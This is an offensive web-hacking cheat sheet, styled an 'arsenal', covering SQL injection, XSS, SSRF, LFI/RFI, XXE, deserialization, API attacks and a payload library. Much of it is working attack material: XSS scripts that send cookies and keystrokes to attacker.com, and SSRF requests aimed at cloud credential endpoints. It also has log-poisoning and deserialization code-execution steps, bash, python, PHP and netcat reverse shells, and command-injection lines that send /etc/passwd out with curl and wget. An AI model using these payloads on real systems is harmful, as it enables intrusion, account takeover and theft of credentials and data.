🗡️ Web Hacking Arsenal 🗡️

💉 SQL Injection

Detection Payloads

' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
admin' --
admin' #
' OR 1=1--
') OR ('1'='1
'||'1'='1
' AND '1'='2
1' AND '1'='1
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--

SQLMap - Automated Exploitation

Union-Based SQLi

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
' UNION SELECT username,password FROM users--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

Blind SQLi - Boolean Based

' AND 1=1--  (True condition)
' AND 1=2--  (False condition)
' AND SUBSTRING(database(),1,1)='a'--
' AND ASCII(SUBSTRING(database(),1,1))>97--
' AND LENGTH(database())>5--

Time-Based Blind SQLi

' AND SLEEP(5)--
'; WAITFOR DELAY '00:00:05'--
' AND BENCHMARK(5000000,MD5('A'))--
' OR IF(1=1,SLEEP(5),0)--

Error-Based SQLi

' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)y)--
' AND EXTRACTVALUE(1,CONCAT(0x7e,database()))--
' AND UPDATEXML(1,CONCAT(0x7e,database()),1)--

Second-Order SQLi

Database-Specific Commands

MySQL

SELECT version()
SELECT database()
SELECT user()
SELECT @@version
SELECT schema_name FROM information_schema.schemata
LOAD_FILE('/etc/passwd')
INTO OUTFILE '/var/www/html/shell.php'

PostgreSQL

SELECT version()
SELECT current_database()
SELECT current_user
SELECT usename FROM pg_user
COPY (SELECT '') TO '/tmp/output.txt'

MSSQL

SELECT @@version
SELECT DB_NAME()
SELECT SYSTEM_USER
EXEC xp_cmdshell 'whoami'
EXEC sp_configure 'show advanced options', 1

🔥 Cross-Site Scripting (XSS)

Basic XSS Payloads

<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>
<body onload=alert('XSS')>
<iframe src="javascript:alert('XSS')">
<input autofocus onfocus=alert('XSS')>
<select autofocus onfocus=alert('XSS')>
<textarea autofocus onfocus=alert('XSS')>
<details open ontoggle=alert('XSS')>

Filter Bypass Techniques

<ScRiPt>alert('XSS')</sCrIpT>
<script>ale\u0072t('XSS')</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>
<scr<script>ipt>alert('XSS')</scr</script>ipt>
<img src=x oneonerrorrror=alert('XSS')>
<svg><script>alert&#40;'XSS'&#41;</script>

Advanced Payloads

Cookie Stealing

<script>
fetch('https://attacker.com/steal?c=' + document.cookie);
</script>

<script>
new Image().src='https://attacker.com/log?c='+encodeURIComponent(document.cookie);
</script>

Keylogger

<script>
document.onkeypress = function(e) {
    fetch('https://attacker.com/log?key=' + e.key);
}
</script>

Phishing

<script>
document.body.innerHTML = '<h1>Session Expired</h1><form action="https://attacker.com/phish"><input name="user"><input type="password" name="pass"><button>Login</button></form>';
</script>

DOM-Based XSS

# URL: http://target.com/#<script>alert('XSS')</script>
# URL: http://target.com/?name=<img src=x onerror=alert('XSS')>

Stored vs Reflected XSS

CSP Bypass

# If script-src allows 'unsafe-inline':
<script>alert('XSS')</script>

# If JSONP endpoint allowed:
<script src="https://allowed-domain.com/jsonp?callback=alert"></script>

# If base-uri not set:
<base href="https://attacker.com/">

Testing Methodology

1. Identify all input points (forms, URL params, headers)
2. Test basic payloads (<script>alert(1)</script>)
3. Analyze response encoding (HTML, URL, JS context)
4. Test context-specific payloads
5. Try filter bypass techniques
6. Check for DOM-based XSS in JavaScript
7. Test stored XSS in all data storage points

🔐 Authentication & Session Management

Common Authentication Flaws

• Weak password policy
• Default credentials (admin/admin, admin/password123)
• Predictable session tokens
• Session fixation
• Missing session expiration
• Lack of account lockout
• Username enumeration
• Password reset vulnerabilities

Brute Force Attacks

Username Enumeration

Valid user: "Invalid password"
Invalid user: "User does not exist"

Timing attack: Valid users take longer (password check)
Status codes: 200 for valid, 404 for invalid

Password Reset Vulnerabilities

Common Issues:

• Predictable reset tokens
• Token not expiring
• Token reusable
• Host header injection
• Parameter pollution

Testing Techniques:

# Host header injection
POST /reset HTTP/1.1
Host: attacker.com

# Parameter pollution
email=victim@target.com&email=attacker@evil.com

# Token prediction
Reset tokens: abc123, abc124, abc125 (sequential)

# No rate limiting
Brute force reset tokens

Session Management Attacks

Session Fixation

1. Attacker gets session: SESSIONID=malicious123
2. Victim clicks link: https://target.com/?SESSIONID=malicious123
3. Victim logs in with attacker's session
4. Attacker uses SESSIONID=malicious123 to access victim's account

Session Hijacking

• Steal via XSS: document.cookie
• Network sniffing (non-HTTPS)
• Predict session tokens

JWT (JSON Web Token) Attacks

Algorithm Confusion

# Change "alg":"RS256" to "alg":"HS256"
# Server now uses public key as HMAC secret

None Algorithm

# Change "alg":"HS256" to "alg":"none"
# Remove signature portion
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.

Weak Secret

JWT Testing Tools

OAuth/SSO Vulnerabilities

• Open redirect in redirect_uri
• CSRF in OAuth flow
• Account takeover via email parameter
• Pre-account takeover (sign up with victim email)

2FA/MFA Bypass

• Response manipulation (change "success":false to true)
• Status code manipulation (change 401 to 200)
• Direct request to post-login page
• Rate limiting bypass (IP rotation)
• Backup codes enumeration
• CSRF on 2FA disable

🚪 IDOR & Broken Access Control

What is IDOR?

Insecure Direct Object Reference - accessing resources by modifying parameter values without proper authorization checks.

Common IDOR Patterns

Numeric IDs

https://target.com/api/user/1234
https://target.com/api/user/1235 (Try other IDs)

https://target.com/invoice?id=100
https://target.com/invoice?id=101 (Access other invoices)

Encoded IDs

# Base64
https://target.com/profile?user=am9obg== (john)
https://target.com/profile?user=amFuZQ== (jane)

# Hashed IDs
https://target.com/doc?id=5d41402abc4b2a76b9719d911017c592 (MD5 of "hello")
Crack or predict the hash function

UUID/GUID

https://target.com/file/550e8400-e29b-41d4-a716-446655440000
Try brute force, prediction, or information disclosure

Testing Methodology

1. Create two accounts (attacker & victim)
2. Identify all object references (user IDs, document IDs, etc.)
3. Try accessing victim's resources with attacker's session
4. Test both GET and POST requests
5. Check JSON/XML body parameters
6. Test with no authentication
7. Test with lower privilege user

Advanced IDOR Techniques

Parameter Pollution

GET /api/user?id=attacker_id&id=victim_id
POST with multiple ID parameters

HTTP Method Override

POST /api/user/123 (Forbidden)
PUT /api/user/123 (Success)
DELETE /api/user/123 (Check this too)

Path Traversal Combined

GET /api/user/../../admin/123
GET /api/user/%2e%2e%2fadmin/123

Horizontal vs Vertical Privilege Escalation

Common Vulnerable Endpoints

• /api/user/{id}
• /profile?user={id}
• /download?file={id}
• /invoice/{id}
• /order/{id}
• /document/{id}
• /admin/user/{id}
• /delete?id={id}

Broken Function Level Access Control

# Regular user accessing admin functions
GET /api/admin/users (Should be forbidden)
POST /api/admin/deleteUser (Should be forbidden)

# Forced browsing
https://target.com/admin
https://target.com/administrator
https://target.com/moderator
https://target.com/staff

Testing with Burp Suite

Automated Testing

🌐 Server-Side Request Forgery (SSRF)

What is SSRF?

SSRF allows an attacker to make the server send requests to internal or external systems, potentially accessing internal resources or services.

Common SSRF Entry Points

• URL parameters (url=, uri=, path=, dest=)
• File upload (import from URL)
• Webhooks
• PDF generators
• Image processors
• API integrations

Basic SSRF Payloads

# Localhost access
http://localhost
http://127.0.0.1
http://[::1]
http://0.0.0.0

# Internal network scanning
http://192.168.0.1
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1

Bypass Techniques

Domain Blacklist Bypass

# Alternative representations of 127.0.0.1
http://127.1
http://127.0.1
http://2130706433 (Decimal)
http://0x7f000001 (Hexadecimal)
http://017700000001 (Octal)

# DNS tricks
http://localtest.me (Resolves to 127.0.0.1)
http://customer1.app.localhost.my.company.127.0.0.1.nip.io

# URL parser confusion
http://evil.com@127.0.0.1
http://127.0.0.1#@evil.com

Protocol Smuggling

file:///etc/passwd
file:///c:/windows/win.ini
dict://127.0.0.1:6379/info
gopher://127.0.0.1:6379/_SET%20key%20value
ldap://127.0.0.1
tftp://127.0.0.1

Open Redirect for SSRF

# If site has open redirect
https://target.com/redirect?url=http://evil.com

# Use it for SSRF
https://vulnerable.com/fetch?url=https://target.com/redirect?url=http://127.0.0.1

Cloud Metadata Endpoints

AWS

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

Google Cloud

http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
(Requires header: Metadata-Flavor: Google)

Azure

http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
(Requires header: Metadata: true)

Port Scanning via SSRF

http://127.0.0.1:22
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:3306 (MySQL)
http://127.0.0.1:5432 (PostgreSQL)
http://127.0.0.1:6379 (Redis)
http://127.0.0.1:27017 (MongoDB)
http://127.0.0.1:9200 (Elasticsearch)

Blind SSRF Detection

Exploitation Techniques

Redis Exploitation

gopher://127.0.0.1:6379/_SET%20test%20value
gopher://127.0.0.1:6379/_CONFIG%20SET%20dir%20/var/www/html
gopher://127.0.0.1:6379/_CONFIG%20SET%20dbfilename%20shell.php

SMTP Exploitation

gopher://127.0.0.1:25/_MAIL%20FROM:attacker@evil.com

Tools for SSRF Testing

📁 Local/Remote File Inclusion (LFI/RFI)

Basic LFI Payloads

../../../etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
....//....//....//etc/passwd
..%252f..%252f..%252fetc%252fpasswd (Double encoding)
..\/..\/..\/etc/passwd
..\\..\\..\\/etc/passwd

Common Linux Files to Test

/etc/passwd
/etc/shadow (Requires root)
/etc/hosts
/etc/hostname
/etc/issue
/proc/self/environ
/proc/self/cmdline
/proc/self/cwd/index.php
/proc/self/fd/0-10
/var/log/apache2/access.log
/var/log/nginx/access.log
/var/log/auth.log
/home/user/.bash_history
/home/user/.ssh/id_rsa
/root/.ssh/id_rsa

Common Windows Files

C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\sam
C:\Windows\win.ini
C:\boot.ini
C:\inetpub\wwwroot\web.config
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\bin\my.ini

Bypass Techniques

Null Byte Injection (PHP < 5.3)

../../../etc/passwd%00
../../../etc/passwd%00.jpg

Truncation (PHP < 5.3)

../../../etc/passwd............[add more dots until 4096 chars]

Wrapper Filters

php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php

Data Wrapper

data://text/plain,
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

Input Wrapper

php://input
POST body: 

Log Poisoning

Apache/Nginx Log Poisoning

1. Inject PHP code in User-Agent:
   User-Agent: 

2. Access log file via LFI:
   page.php?file=/var/log/apache2/access.log&cmd=whoami

SSH Log Poisoning

1. SSH with PHP payload as username:
   ssh ''@target.com

2. Access auth.log:
   page.php?file=/var/log/auth.log&cmd=whoami

Remote File Inclusion (RFI)

page.php?file=http://attacker.com/shell.txt
page.php?file=\\attacker.com\share\shell.txt
page.php?file=ftp://attacker.com/shell.txt

LFI to RCE Techniques

Session File Inclusion

1. Inject PHP in session variable
2. Include session file:
   /var/lib/php/sessions/sess_[PHPSESSID]
   /tmp/sess_[PHPSESSID]

Upload Temporary Files

1. Upload file, capture temp path from phpinfo()
2. Include: /tmp/phpXXXXXX

Proc/self/environ

1. Inject in User-Agent header
2. Include: /proc/self/environ

Automated LFI Testing

Fuzzing for LFI

# Common parameter names
?file=
?page=
?include=
?path=
?document=
?folder=
?root=
?pg=
?style=
?pdf=
?template=
?php_path=
?doc=

📄 XML External Entity (XXE)

What is XXE?

XXE exploits XML parsers that process external entity references, allowing file disclosure, SSRF, or RCE.

Basic XXE Payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>
    <name>&xxe;</name>
</root>

File Disclosure

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">]>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>

Blind XXE - Out-of-Band (OOB)

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>

# evil.dtd on attacker server:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "SYSTEM 'http://attacker.com/?data=%file;'">
%eval;

SSRF via XXE

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/admin">]>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://localhost:8080">]>

Billion Laughs Attack (DoS)

<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>

XXE in Different Data Formats

SOAP Request

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <foo>&xxe;</foo>
  </soap:Body>
</soap:Envelope>

SVG Upload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text x="0" y="16">&xxe;</text>
</svg>

Office Documents (DOCX, XLSX)

1. Unzip document
2. Edit word/document.xml or xl/workbook.xml
3. Add XXE payload
4. Rezip and upload

XXE in SAML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
  <Issuer>&xxe;</Issuer>
</samlp:Response>

Bypass Filters

# UTF-16 encoding
<?xml version="1.0" encoding="UTF-16"?>

# Using parameter entities
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe;]>

# XInclude
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Detection

1. Look for XML input (Content-Type: application/xml)
2. Check file upload features accepting XML-based formats
3. Test APIs with XML payloads
4. Look for SOAP services
5. Check RSS feeds, SVG uploads, document processing

Tools

🔓 Insecure Deserialization

What is Deserialization?

Converting serialized data back to objects. Insecure deserialization allows attackers to manipulate serialized objects to execute arbitrary code, escalate privileges, or bypass authentication.

PHP Object Injection

Identifying Serialized Data

# PHP serialized format
O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";}

# Base64 encoded
TzozOiJVc2VyIjoyOntzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6NDoicm9sZSI7czo1OiJhZG1pbiI7fQ==

Magic Methods Exploitation

__construct()   # Called when object is created
__destruct()    # Called when object is destroyed
__toString()    # Called when object is treated as string
__wakeup()      # Called during unserialize()
__sleep()       # Called during serialize()

Example Exploit

<?php
class User {
    public $name;
    public $isAdmin = false;
    
    function __destruct() {
        if($this->isAdmin) {
            eval($this->name);
        }
    }
}

// Create malicious object
$obj = new User();
$obj->name = "system('whoami');";
$obj->isAdmin = true;
echo serialize($obj);
?>

Java Deserialization

Identifying Java Serialized Data

# Java serialized magic bytes
rO0AB (Base64)
ac ed 00 05 (Hex)

# Common in:
- Cookies
- Hidden form fields
- JMX endpoints
- RMI services

Tools for Java Deserialization

Common Gadget Chains

• CommonsCollections1-7
• Spring1-2
• Groovy1
• JRMPClient
• URLDNS (for detection)

Python Pickle

Identifying Pickle Data

# Python pickle starts with
\x80\x03 or \x80\x04 (protocol 3/4)

# Base64 encoded
gAN9cQAoWAUAAABjb2xvcnEBWAQAAABibHVl...

Exploit Example

import pickle
import base64
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('ping attacker.com',))

payload = base64.b64encode(pickle.dumps(Exploit()))
print(payload)

.NET Deserialization

Tools

Node.js Deserialization

# node-serialize module
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ping attacker.com')}()"}

Ruby Marshal

# Ruby Marshal format
\x04\x08

# Exploit
eval_code = "system('whoami')"
payload = Marshal.dump(eval(eval_code))

Detection Methods

1. Look for Base64-encoded cookies or parameters
2. Decode and check for serialization patterns
3. Test with URLDNS gadget chain (safe, DNS-based detection)
4. Monitor for errors revealing framework versions
5. Check server headers for technology stack

Exploitation Process

1. Identify serialized data format
2. Determine the language/framework
3. Check for known vulnerable libraries
4. Generate payload with appropriate gadget chain
5. Encode payload (Base64, URL encoding)
6. Send in cookie, POST data, or header
7. Monitor for OOB callbacks or errors

Common Vulnerable Components

⚡ API Security Testing

API Reconnaissance

Finding APIs

• Check /api, /v1, /v2, /rest, /graphql endpoints
• Look in JavaScript files for API calls
• Check mobile app traffic
• Browse documentation sites (docs.target.com, api.target.com)
• Check robots.txt and sitemap.xml

REST API Testing

HTTP Method Testing

GET /api/users/123
PUT /api/users/123 (Try updating)
DELETE /api/users/123 (Try deleting)
POST /api/users (Try creating)
PATCH /api/users/123 (Try partial update)
OPTIONS /api/users (Check allowed methods)

Mass Assignment

# Legitimate request
POST /api/users
{"username":"newuser","email":"user@test.com"}

# Attack: Add admin field
POST /api/users
{"username":"newuser","email":"user@test.com","isAdmin":true,"role":"admin"}

# Try different parameter names
{"admin":true,"is_admin":true,"role":"administrator","privilege":"admin"}

API Authentication Bypass

Common Issues

• Missing authentication on sensitive endpoints
• API key in URL parameters (leaked in logs)
• Weak API key generation
• API keys in client-side code
• No rate limiting

Testing Techniques

# Remove auth header entirely
GET /api/admin/users
(No Authorization header)

# Try with empty token
Authorization: Bearer 

# Try with invalid token format
Authorization: Bearer invalid

# Try different authentication schemes
Authorization: Basic YWRtaW46YWRtaW4=
Authorization: Bearer token
Authorization: API-Key token

GraphQL Security

Introspection Query

{
  __schema {
    types {
      name
      fields {
        name
        type {
          name
        }
      }
    }
  }
}

Common GraphQL Vulnerabilities

• Introspection enabled in production
• No depth limiting (nested queries)
• No rate limiting
• Information disclosure via errors
• IDOR via object IDs

GraphQL Batching Attack

[
  {"query":"mutation {login(user:\"admin\",pass:\"pass1\"){token}}"},
  {"query":"mutation {login(user:\"admin\",pass:\"pass2\"){token}}"},
  {"query":"mutation {login(user:\"admin\",pass:\"pass3\"){token}}"}
  ...
]

Field Suggestions

# Typo in field name may reveal hidden fields
{user(id:1){usernameee}} 

# Error: Did you mean "username", "usernameHash", "usernameInternal"?

API Rate Limiting Bypass

# IP rotation
X-Forwarded-For: 1.2.3.4
X-Real-IP: 1.2.3.5

# Change user agent
User-Agent: RandomAgent/1.0

# Add custom headers
X-Originating-IP: 1.2.3.4
X-Remote-IP: 1.2.3.4
X-Client-IP: 1.2.3.4

# Race conditions (send multiple requests simultaneously)

API Fuzzing

API Version Testing

https://api.target.com/v1/users
https://api.target.com/v2/users (Try different versions)
https://api.target.com/v3/users
https://api.target.com/internal/users
https://api.target.com/beta/users

# Header-based versioning
Accept: application/vnd.api.v1+json
Accept: application/vnd.api.v2+json

Content-Type Manipulation

Content-Type: application/json
Content-Type: application/xml
Content-Type: application/x-www-form-urlencoded
Content-Type: text/plain

# Server may parse differently, bypassing validation

API Testing Tools

🛠️ Essential Tools & Commands

Reconnaissance Tools

nmap -sC -sV target.com
nmap -p- --min-rate 1000 target.com
nmap --script vuln target.com

sublist3r -d target.com
sublist3r -d target.com -b

amass enum -d target.com
amass enum -passive -d target.com

whatweb target.com
whatweb -a 3 target.com

Web Scanners

nikto -h https://target.com
nikto -h target.com -p 80,443

nuclei -u https://target.com
nuclei -l urls.txt -t cves/

wpscan --url https://target.com
wpscan --url target.com --enumerate u,p

wapiti -u https://target.com
wapiti -u target.com --scope page

Exploitation Tools

sqlmap -u "url" --dbs
sqlmap -r request.txt --batch

msfconsole
search exploit_name
use exploit/path
set RHOSTS target
exploit

hydra -l admin -P pass.txt ssh://target
hydra -L users.txt -P pass.txt target http-post-form

john --wordlist=rockyou.txt hash.txt
john --show hash.txt

Burp Suite Extensions

• Autorize - Automated access control testing
• Logger++ - Advanced logging
• Turbo Intruder - Fast attacks
• J2EE Scan - Java scanning
• Param Miner - Parameter discovery
• Upload Scanner - File upload testing
• Collaborator Everywhere - Blind vulnerability detection

Wordlists

Useful Commands

File Transfer

# Python HTTP Server
python3 -m http.server 8000

# Download with wget
wget http://attacker.com/file.txt

# Download with curl
curl http://attacker.com/file.txt -o file.txt

# Netcat file transfer
# Receiver: nc -lvp 4444 > file.txt
# Sender: nc target_ip 4444 < file.txt

Reverse Shells

# Bash
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# PHP
php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Netcat
nc -e /bin/sh attacker_ip 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker_ip 4444 >/tmp/f

TTY Shell Upgrade

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
reset

💣 Payload Library

Command Injection Payloads

# Basic
; whoami
| whoami
|| whoami
& whoami
&& whoami
$(whoami)
`whoami`

# Bypass filters
who$()ami
w\ho\am\i
wh''oam''i
who$'ami'
$(wh$()ami)

# Time-based detection
; sleep 5
| sleep 5 |
; ping -c 5 127.0.0.1

# Exfiltration
; curl http://attacker.com/$(whoami)
; wget http://attacker.com/$(cat /etc/passwd | base64)

Path Traversal Payloads

../
..%2F
..;/
..\
..\%5c
%2e%2e%2f
%252e%252e%252f
..%c0%af
....//
....\/
..%00/
..%0d/
..%5c
..%c1%9c

Open Redirect Payloads

?url=https://evil.com
?redirect=//evil.com
?next=/\evil.com
?return=https:evil.com
?rurl=evil.com%2f%2f.target.com
?dest=javascript:alert(1)
?url=///evil.com
?goto=https://google.com@evil.com

CRLF Injection

%0d%0aSet-Cookie:admin=true
%0d%0aLocation:https://evil.com
%0aSet-Cookie:sessionid=malicious
%0d%0a%0d%0aInjected Content

SSTI (Server-Side Template Injection)

Jinja2 (Python)

{{7*7}}
{{config}}
{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}

Twig (PHP)

{{7*7}}
{{_self.env.display("test")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

Freemarker (Java)

${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}

NoSQL Injection

MongoDB

# Authentication bypass
username[$ne]=admin&password[$ne]=admin
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}

# Data extraction
username[$regex]=^a.*&password[$ne]=1
username[$regex]=^admin.*&password[$ne]=1

CouchDB

{"selector": {"_id": {"$gt": null}}}

LDAP Injection

# Authentication bypass
*)(uid=*))(|(uid=*
admin)(&(password=*))
*)(objectClass=*

# Data extraction
*)(cn=a*
*)(mail=*@target.com)

CSV Injection

=cmd|'/c calc'!A1
@SUM(1+1)*cmd|'/c calc'!A1
+cmd|'/c calc'!A1
-cmd|'/c calc'!A1
=1+1+cmd|'/c calc'!A1

Web Cache Poisoning

X-Forwarded-Host: evil.com
X-Forwarded-Scheme: nothttps
X-Original-URL: /admin
X-Rewrite-URL: /admin

HTTP Request Smuggling

# CL.TE
POST / HTTP/1.1
Host: target.com
Content-Length: 6
Transfer-Encoding: chunked

0

G

# TE.CL
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked

5c
GET /admin HTTP/1.1
Host: target.com

0

Race Conditions

# Turbo Intruder script
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=10)
    for i in range(100):
        engine.queue(target.req)

def handleResponse(req, interesting):
    table.add(req)